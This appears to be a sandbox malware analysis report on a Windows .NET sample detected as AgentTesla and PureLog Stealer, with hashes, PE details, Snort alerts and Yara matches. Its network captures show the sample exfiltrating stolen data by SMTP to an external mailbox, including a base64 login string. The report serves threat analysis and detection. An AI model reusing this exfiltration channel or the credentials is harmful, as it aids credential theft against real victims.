	Swift Payment.bat	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.12.205
	https://8fq7c.eceydri.com/WK9D/	Get hash	malicious	HTMLPhisher	Browse	104.26.12.205
	FW_ FHAS Inc_ - Private and Confidential.msg	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.26.12.205
	Proforma Request.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	SecuriteInfo.com.Program.Unwanted.5215.4772.1835.exe	Get hash	malicious	PureLog Stealer	Browse	104.26.12.205
	SecuriteInfo.com.Program.Unwanted.5215.4772.1835.exe	Get hash	malicious	PureLog Stealer	Browse	104.26.12.205
	https://colmec.it/category/news	Get hash	malicious	Unknown	Browse	104.26.12.205

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.941749842774642
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.79% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Win16/32 Executable Delphi generic (2074/23) 0.01%
File name:	SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe
File size:	724'992 bytes
MD5:	946a0735432aca25fa370970e97a3dbb
SHA1:	9ffac6be378c7379a8ea11a5a439445a46f6bb5c
SHA256:	7628ace4f2627bc65377a8123ce9e05849e4e4b3fd5b862e03ffcee42274ccfb
SHA512:	9a54f14e47637dd6001ec2426111af5cbf18d96ef2d1fc320d15ba86722d7a445029354e91d82b58617180e141f207245ffb0c15b46fdb89253333c85c77f461
SSDEEP:	12288:PWYIPXjxannnHg2r+Eu1ed8MBqIg5B+gZ9r/XIc/P/EtnOG96TchIf6+Xn7M:PWYIPFannnHg2r1uc3Bqr5QgZl/PAOGb
TLSH:	9BF422C923DD8B2BDCB68BF814721574C37CE96B7962E24D5E8202D84A333C1656177B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....)f..............0...... ........... ... ....@.. .......................`............`................................

File Icon


Icon Hash:	c14e4c4c4c4c4f41

Static PE Info

General

Entrypoint:	0x4b04da
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6629C211 [Thu Apr 25 02:38:09 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
xor eax, 35455354h
xor dword ptr [edi+eax*2], esi
dec eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebx+4Ah], dl
push ebx
cmp byte ptr [eax+edi+34h], al
inc ebx
inc ebx
xor al, 37h
xor eax, 00000035h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb0488	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb2000	0x1008	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb4000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xae500	0xae800	ed5451a22624ab362104aaabbe96ab18	False	0.9530914219197708	data	7.9668276845634205	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xb2000	0x1008	0x1800	f728b346278cb9e52ce4901b3ac6691c	False	0.54150390625	data	5.084322080511218	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xb4000	0xc	0x800	5f4df0bc6c64248bec7632bb1d2ddc35	False	0.015625	data	0.024299385236084957	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xb20c8	0xc08	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9308441558441558
RT_GROUP_ICON	0xb2ce0	0x14	data	1.05
RT_VERSION	0xb2d04	0x300	MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"	0.44140625

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/25/24-07:17:01.018869	TCP	2851779	ETPRO TROJAN Agent Tesla Telegram Exfil	49735	587	192.168.2.4	192.185.35.67
04/25/24-07:17:01.018819	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49735	587	192.168.2.4	192.185.35.67
04/25/24-07:17:01.018869	TCP	2855542	ETPRO TROJAN Agent Tesla CnC Exfil Activity	49735	587	192.168.2.4	192.185.35.67
04/25/24-07:17:01.018869	TCP	2855245	ETPRO TROJAN Agent Tesla Exfil via SMTP	49735	587	192.168.2.4	192.185.35.67
04/25/24-07:17:01.018869	TCP	2840032	ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2	49735	587	192.168.2.4	192.185.35.67

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 25, 2024 07:16:58.406236887 CEST	49732	443	192.168.2.4	104.26.12.205
Apr 25, 2024 07:16:58.406316996 CEST	443	49732	104.26.12.205	192.168.2.4
Apr 25, 2024 07:16:58.406405926 CEST	49732	443	192.168.2.4	104.26.12.205
Apr 25, 2024 07:16:58.413974047 CEST	49732	443	192.168.2.4	104.26.12.205
Apr 25, 2024 07:16:58.414010048 CEST	443	49732	104.26.12.205	192.168.2.4
Apr 25, 2024 07:16:58.651726007 CEST	443	49732	104.26.12.205	192.168.2.4
Apr 25, 2024 07:16:58.651796103 CEST	49732	443	192.168.2.4	104.26.12.205
Apr 25, 2024 07:16:58.670030117 CEST	49732	443	192.168.2.4	104.26.12.205
Apr 25, 2024 07:16:58.670068026 CEST	443	49732	104.26.12.205	192.168.2.4
Apr 25, 2024 07:16:58.671001911 CEST	443	49732	104.26.12.205	192.168.2.4
Apr 25, 2024 07:16:58.717256069 CEST	49732	443	192.168.2.4	104.26.12.205
Apr 25, 2024 07:16:58.730763912 CEST	49732	443	192.168.2.4	104.26.12.205
Apr 25, 2024 07:16:58.772151947 CEST	443	49732	104.26.12.205	192.168.2.4
Apr 25, 2024 07:16:58.934437990 CEST	443	49732	104.26.12.205	192.168.2.4
Apr 25, 2024 07:16:58.934509993 CEST	443	49732	104.26.12.205	192.168.2.4
Apr 25, 2024 07:16:58.934562922 CEST	49732	443	192.168.2.4	104.26.12.205
Apr 25, 2024 07:16:58.940745115 CEST	49732	443	192.168.2.4	104.26.12.205
Apr 25, 2024 07:16:59.057234049 CEST	49734	80	192.168.2.4	208.95.112.1
Apr 25, 2024 07:16:59.178817034 CEST	80	49734	208.95.112.1	192.168.2.4
Apr 25, 2024 07:16:59.178916931 CEST	49734	80	192.168.2.4	208.95.112.1
Apr 25, 2024 07:16:59.179042101 CEST	49734	80	192.168.2.4	208.95.112.1
Apr 25, 2024 07:16:59.302318096 CEST	80	49734	208.95.112.1	192.168.2.4
Apr 25, 2024 07:16:59.357919931 CEST	49734	80	192.168.2.4	208.95.112.1
Apr 25, 2024 07:16:59.737937927 CEST	49734	80	192.168.2.4	208.95.112.1
Apr 25, 2024 07:16:59.859657049 CEST	80	49734	208.95.112.1	192.168.2.4
Apr 25, 2024 07:16:59.863126040 CEST	49734	80	192.168.2.4	208.95.112.1
Apr 25, 2024 07:16:59.877578974 CEST	49735	587	192.168.2.4	192.185.35.67
Apr 25, 2024 07:16:59.987449884 CEST	587	49735	192.185.35.67	192.168.2.4
Apr 25, 2024 07:16:59.991141081 CEST	49735	587	192.168.2.4	192.185.35.67
Apr 25, 2024 07:17:00.223396063 CEST	587	49735	192.185.35.67	192.168.2.4
Apr 25, 2024 07:17:00.223627090 CEST	49735	587	192.168.2.4	192.185.35.67
Apr 25, 2024 07:17:00.334290981 CEST	587	49735	192.185.35.67	192.168.2.4
Apr 25, 2024 07:17:00.335320950 CEST	49735	587	192.168.2.4	192.185.35.67
Apr 25, 2024 07:17:00.448756933 CEST	587	49735	192.185.35.67	192.168.2.4
Apr 25, 2024 07:17:00.449084997 CEST	49735	587	192.168.2.4	192.185.35.67
Apr 25, 2024 07:17:00.599716902 CEST	587	49735	192.185.35.67	192.168.2.4
Apr 25, 2024 07:17:00.659002066 CEST	587	49735	192.185.35.67	192.168.2.4
Apr 25, 2024 07:17:00.659195900 CEST	49735	587	192.168.2.4	192.185.35.67
Apr 25, 2024 07:17:00.769047976 CEST	587	49735	192.185.35.67	192.168.2.4
Apr 25, 2024 07:17:00.769064903 CEST	587	49735	192.185.35.67	192.168.2.4
Apr 25, 2024 07:17:00.769201994 CEST	49735	587	192.168.2.4	192.185.35.67
Apr 25, 2024 07:17:00.908168077 CEST	587	49735	192.185.35.67	192.168.2.4
Apr 25, 2024 07:17:00.908380985 CEST	49735	587	192.168.2.4	192.185.35.67
Apr 25, 2024 07:17:01.018264055 CEST	587	49735	192.185.35.67	192.168.2.4
Apr 25, 2024 07:17:01.018347025 CEST	587	49735	192.185.35.67	192.168.2.4
Apr 25, 2024 07:17:01.018819094 CEST	49735	587	192.168.2.4	192.185.35.67
Apr 25, 2024 07:17:01.018868923 CEST	49735	587	192.168.2.4	192.185.35.67
Apr 25, 2024 07:17:01.018901110 CEST	49735	587	192.168.2.4	192.185.35.67
Apr 25, 2024 07:17:01.018920898 CEST	49735	587	192.168.2.4	192.185.35.67
Apr 25, 2024 07:17:01.129340887 CEST	587	49735	192.185.35.67	192.168.2.4
Apr 25, 2024 07:17:01.130444050 CEST	587	49735	192.185.35.67	192.168.2.4
Apr 25, 2024 07:17:01.170411110 CEST	49735	587	192.168.2.4	192.185.35.67
Apr 25, 2024 07:18:39.764529943 CEST	49735	587	192.168.2.4	192.185.35.67
Apr 25, 2024 07:18:39.914735079 CEST	587	49735	192.185.35.67	192.168.2.4
Apr 25, 2024 07:18:40.076050043 CEST	587	49735	192.185.35.67	192.168.2.4
Apr 25, 2024 07:18:40.076189995 CEST	49735	587	192.168.2.4	192.185.35.67
Apr 25, 2024 07:18:40.076190948 CEST	49735	587	192.168.2.4	192.185.35.67
Apr 25, 2024 07:18:40.186196089 CEST	587	49735	192.185.35.67	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 25, 2024 07:16:58.291160107 CEST	62479	53	192.168.2.4	1.1.1.1
Apr 25, 2024 07:16:58.401407003 CEST	53	62479	1.1.1.1	192.168.2.4
Apr 25, 2024 07:16:58.945625067 CEST	58915	53	192.168.2.4	1.1.1.1
Apr 25, 2024 07:16:59.056652069 CEST	53	58915	1.1.1.1	192.168.2.4
Apr 25, 2024 07:16:59.738641024 CEST	53710	53	192.168.2.4	1.1.1.1
Apr 25, 2024 07:16:59.876885891 CEST	53	53710	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 25, 2024 07:16:58.291160107 CEST	192.168.2.4	1.1.1.1	0xc2f0	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Apr 25, 2024 07:16:58.945625067 CEST	192.168.2.4	1.1.1.1	0x8656	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Apr 25, 2024 07:16:59.738641024 CEST	192.168.2.4	1.1.1.1	0x5bd8	Standard query (0)	mail.nationalkham.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Apr 25, 2024 07:16:58.401407003 CEST	1.1.1.1	192.168.2.4	0xc2f0	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Apr 25, 2024 07:16:58.401407003 CEST	1.1.1.1	192.168.2.4	0xc2f0	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Apr 25, 2024 07:16:58.401407003 CEST	1.1.1.1	192.168.2.4	0xc2f0	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Apr 25, 2024 07:16:59.056652069 CEST	1.1.1.1	192.168.2.4	0x8656	No error (0)	ip-api.com	208.95.112.1	A (IP address)	IN (0x0001)	false
Apr 25, 2024 07:16:59.876885891 CEST	1.1.1.1	192.168.2.4	0x5bd8	No error (0)	mail.nationalkham.com	192.185.35.67	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49734	208.95.112.1	80	7404	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 07:16:59.179042101 CEST	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Apr 25, 2024 07:16:59.302318096 CEST	174	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 05:16:58 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 5 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 74 72 75 65 0a Data Ascii: true

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49732	104.26.12.205	443	7404	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-25 05:16:58 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-04-25 05:16:58 UTC	211	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 05:16:58 GMT Content-Type: text/plain Content-Length: 14 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 879bdd33cfda674c-ATL
2024-04-25 05:16:58 UTC	14	IN	Data Raw: 31 38 35 2e 31 35 32 2e 36 36 2e 32 33 30 Data Ascii: 185.152.66.230

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Apr 25, 2024 07:17:00.223396063 CEST	587	49735	192.185.35.67	192.168.2.4	220-gator4087.hostgator.com ESMTP Exim 4.96.2 #2 Thu, 25 Apr 2024 00:17:00 -0500 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Apr 25, 2024 07:17:00.223627090 CEST	49735	587	192.168.2.4	192.185.35.67	EHLO 134349
Apr 25, 2024 07:17:00.334290981 CEST	587	49735	192.185.35.67	192.168.2.4	250-gator4087.hostgator.com Hello 134349 [185.152.66.230] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Apr 25, 2024 07:17:00.335320950 CEST	49735	587	192.168.2.4	192.185.35.67	AUTH login c2FsZXNAbmF0aW9uYWxraGFtLmNvbQ==
Apr 25, 2024 07:17:00.448756933 CEST	587	49735	192.185.35.67	192.168.2.4	334 UGFzc3dvcmQ6
Apr 25, 2024 07:17:00.659002066 CEST	587	49735	192.185.35.67	192.168.2.4	235 Authentication succeeded
Apr 25, 2024 07:17:00.659195900 CEST	49735	587	192.168.2.4	192.185.35.67	MAIL FROM:<sales@nationalkham.com>
Apr 25, 2024 07:17:00.769064903 CEST	587	49735	192.185.35.67	192.168.2.4	250 OK
Apr 25, 2024 07:17:00.769201994 CEST	49735	587	192.168.2.4	192.185.35.67	RCPT TO:<newmankint@yandex.com>
Apr 25, 2024 07:17:00.908168077 CEST	587	49735	192.185.35.67	192.168.2.4	250 Accepted
Apr 25, 2024 07:17:00.908380985 CEST	49735	587	192.168.2.4	192.185.35.67	DATA
Apr 25, 2024 07:17:01.018347025 CEST	587	49735	192.185.35.67	192.168.2.4	354 Enter message, ending with "." on a line by itself
Apr 25, 2024 07:17:01.018920898 CEST	49735	587	192.168.2.4	192.185.35.67	.
Apr 25, 2024 07:17:01.130444050 CEST	587	49735	192.185.35.67	192.168.2.4	250 OK id=1rzrTg-0028h6-36
Apr 25, 2024 07:18:39.764529943 CEST	49735	587	192.168.2.4	192.185.35.67	QUIT
Apr 25, 2024 07:18:40.076050043 CEST	587	49735	192.185.35.67	192.168.2.4	221 gator4087.hostgator.com closing connection

Target ID:	0
Start time:	07:16:55
Start date:	25/04/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe"
Imagebase:	0xdc0000
File size:	724'992 bytes
MD5 hash:	946A0735432ACA25FA370970E97A3DBB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1688397215.0000000005890000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1686492613.0000000004239000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1686492613.0000000004C27000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1686492613.0000000004C27000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	07:16:56
Start date:	25/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x670000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4135337637.0000000002BBA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4135337637.0000000002B95000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4135337637.0000000002B95000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	10.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	155
Total number of Limit Nodes:	12

Executed Functions

Function 07C40448 Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1689757039.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c40000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82435f2a601d853b4eed8785bda5f48d19943075ce86fd65b92435a01075a387
Instruction ID: 4ee67b16de6d75515d6d2e1595fc078874bc8f75192960da83c831b2980e1794
Opcode Fuzzy Hash: 82435f2a601d853b4eed8785bda5f48d19943075ce86fd65b92435a01075a387
Instruction Fuzzy Hash: 42C1EDB1740B068FDB29EB75C450B6EB7F6AF89700F1444ADD2468B394DB34EA82CB51

Uniqueness

Uniqueness Score: -1.00%

Function 07B5089F Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d50ae5587e49206585afec7eeb68113e6c6a9e4e46d60a967858b15e6298d0e2
Instruction ID: 66cc244b4421096d6f33e97e01476d2f02fea036e912c425470359475d5be4e2
Opcode Fuzzy Hash: d50ae5587e49206585afec7eeb68113e6c6a9e4e46d60a967858b15e6298d0e2
Instruction Fuzzy Hash: BC513AB0E1520A9FEB04DFAAD8556AEBBF2EF89310F14946AE811A7354D7345A018F90

Uniqueness

Uniqueness Score: -1.00%

Function 07B508B0 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f0721746ae7a5e285c584c1b78814f992639aa67722abf06c07922c7839aff0
Instruction ID: 4023e2843c5b65994d892b24da71d294dc078f7bb248099ea010940cc9a1910c
Opcode Fuzzy Hash: 9f0721746ae7a5e285c584c1b78814f992639aa67722abf06c07922c7839aff0
Instruction Fuzzy Hash: 2C5138B0E1520A8FEB04DFAAD8556AEBBF2EF89310F14942AE815A7354D7345A018F90

Uniqueness

Uniqueness Score: -1.00%

Function 017DD7F8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 017DD876
GetCurrentThread.KERNEL32 ref: 017DD8B3
GetCurrentProcess.KERNEL32 ref: 017DD8F0
GetCurrentThreadId.KERNEL32 ref: 017DD949

Strings

g.D, xrefs: 017DD814

Memory Dump Source

Source File: 00000000.00000002.1684997542.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17d0000_SecuriteInfo.jbxd

Similarity

API ID: Current$ProcessThread
String ID: g.D
API String ID: 2063062207-477188214
Opcode ID: 263041ab5da437d2c6c7a666b0c80e16a05b4be09a079aae388c06642a1148c9
Instruction ID: 10b8ca331062f1b1d32087f60aeac3f235285178da3dffee28bda3e4f02f26a1
Opcode Fuzzy Hash: 263041ab5da437d2c6c7a666b0c80e16a05b4be09a079aae388c06642a1148c9
Instruction Fuzzy Hash: 145126B09007498FDB14DFA9D548B9EFBF1EB88314F20C069E059A73A5DB349984CF65

Uniqueness

Uniqueness Score: -1.00%

Function 07B5D3A9 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 245
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07B5D5E6

Strings

g.D, xrefs: 07B5D41A
g.D, xrefs: 07B5D3EB

Memory Dump Source

Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd

Similarity

API ID: CreateProcess
String ID: g.D$g.D
API String ID: 963392458-1449590682
Opcode ID: 66fedea27b4e257ec78b722b4eb91d10d3663c710b3239b8a0b569ee18ec1f36
Instruction ID: 16378ba9ddc5c3415b896d96f6d40fc00b0414d5e013830245368ea4820fc30d
Opcode Fuzzy Hash: 66fedea27b4e257ec78b722b4eb91d10d3663c710b3239b8a0b569ee18ec1f36
Instruction Fuzzy Hash: D2914EB1E0065ADFEB10DFA8C8807DDBBB2FF44314F1482A9D849A7250DB749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 07B5D3B0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07B5D5E6

Strings

g.D, xrefs: 07B5D41A
g.D, xrefs: 07B5D3EB

Memory Dump Source

Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

